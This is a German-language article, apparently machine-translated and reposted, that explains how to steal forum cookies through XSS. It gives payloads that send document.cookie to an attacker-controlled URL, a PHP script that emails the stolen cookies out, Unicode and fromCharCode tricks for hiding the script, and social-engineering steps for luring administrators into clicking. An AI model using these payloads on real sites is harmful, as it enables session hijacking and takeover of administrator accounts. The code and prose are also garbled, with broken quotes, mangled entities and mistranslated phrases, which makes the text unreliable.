Heim  >  Artikel  >  Web-Frontend  >  XSS-Angriff, der die JavaScript-Ausführung beim Cookie-Spoofing verbirgt

XSS-Angriff, der die JavaScript-Ausführung beim Cookie-Spoofing verbirgt

高洛峰
高洛峰Original
2016-11-25 09:45:001431Durchsuche

Wenn Sie zum Beispiel einen Ort finden, an dem XSS möglich ist:
<script>Alarm (wird einfach angezeigt, egal was passiert)</script>

Besorgen Sie sich eine Datei, die Cookies stiehlt selbst.

Der Zweck besteht darin, anderen Zuschauern das Durchsuchen der von uns entworfenen Fallen zu ermöglichen
<script>document.location=http://URL.com/cookie.php?cookie='+escape ( document.cookie) </script>

Mehr dazu muss ich nicht sagen. .

Jetzt reden wir hauptsächlich darüber, wie man die JavaScript-Ausführung verbirgt.

Vielleicht sind Sie es gewohnt, jeden Tag auf milw0rm.com zu gehen, um EXP zu sehen.

Jedes Mal, wenn die EXP der XSS-Schwachstelle veröffentlicht wird, wenn wir sie ausnutzen.

kann aber keine Informationen speichern, woran liegt das? .

Große Foren wie Magic und PHPBB weisen alle XSS-Schwachstellen auf.

Das habe ich dir gegeben
<script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) </script&gt ;<br><br> zeigt Javascript-Fehler an. <br><br>Es gibt zwei Lösungen. Wir können externe sensible Informationen in Unicode kodieren. <br><br>Geben Sie eine URL an: http://www.mikezilla.com/exp0012.html.<br><br> Das ist wie es durch Kodierung ist: <br><script>eval(location.href="http://www.php1.cn/"><br>Wenn das oben genannte nicht funktioniert, verwenden Sie die zweite Methode <br> <br>Die Auswertungsfunktion in Javascript vonCharCode<br><br>Wie oben erwähnt, können einige Websites mit Unicode kodiert werden<br><br>Zum Beispiel ist die kodierte Zahl 104, 116, 116, 112 HTTP<br><br>Wenn das Forum andere Editoren verwendet, z. B. den von PHPWind verwendeten WYSIWYG-Editor <br><br>, wird die direkte Eingabe von http://url.com auf jeden Fall angezeigt <br><br> Dann werden wir es tun Ändern Sie es basierend auf dem Format der Editor-URL.<br><br>Zum Beispiel ist die Website, die COOKIE stiehlt, http://www.URL.com<br><br>Wir werden dies tun<br>http: //www.url.com<br><br>Natürlich können Sie den angezeigten Teil durch attraktive Informationen ersetzen, um das Management und die Klicks zu betrügen <br><br>Mit ein wenig Social Engineering haben Sie jetzt die ursprüngliche Idee fertiggestellt. Machen wir es<br><br>Schritt 1: Der Manager sah die von uns erstellte Falle und klickte darauf<br><br>Schritt 2: Das Javascript wurde erfolgreich ausgeführt: Gestohlene COOKIE-Datei erstellt, um Cookie zu stehlen <br><br> Schritt 4: Wir können nicht so dumm sein, dass die URL-Verbindung reiner Text ist, und die URL mit Unicode verschlüsseln (hier heißt es üblicherweise verschlüsselt) http://mikezilla.com/exp0012.html<br><br>Schritt 5: Die abgefangenen Cookie-Informationen liegen natürlich nicht im Klartext vor. Wir müssen nur den Firefox-Cookie-Editor verwenden<br>, um den COOKIE zu ersetzen, oder andere Tools wie CookieEditor verwenden Persönlicher Vorschlag: Cookies zu stehlen bedeutet nicht unbedingt, Speicherplatz zum Sammeln von Cookie-Informationen zu nutzen<br>Zum Beispiel sieht das Erstellen eines Postfachs zum Sammeln dieser Informationen so aus<br><?<br/><br/>mail("hackeroo@hotmail.com ","Keksmonster",$_REQUEST[cookie]);<br/><br/>?><br><html><br><script>document.location=http://www.URL.com /'</script>


Okay, stehlen Sie einfach die wertvollen Informationen und ersetzen Sie das Cookie. . Was Buzhu ersetzt, ist Buzhus Autorität, und was das Management ersetzt, ist Managementautorität. .

Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn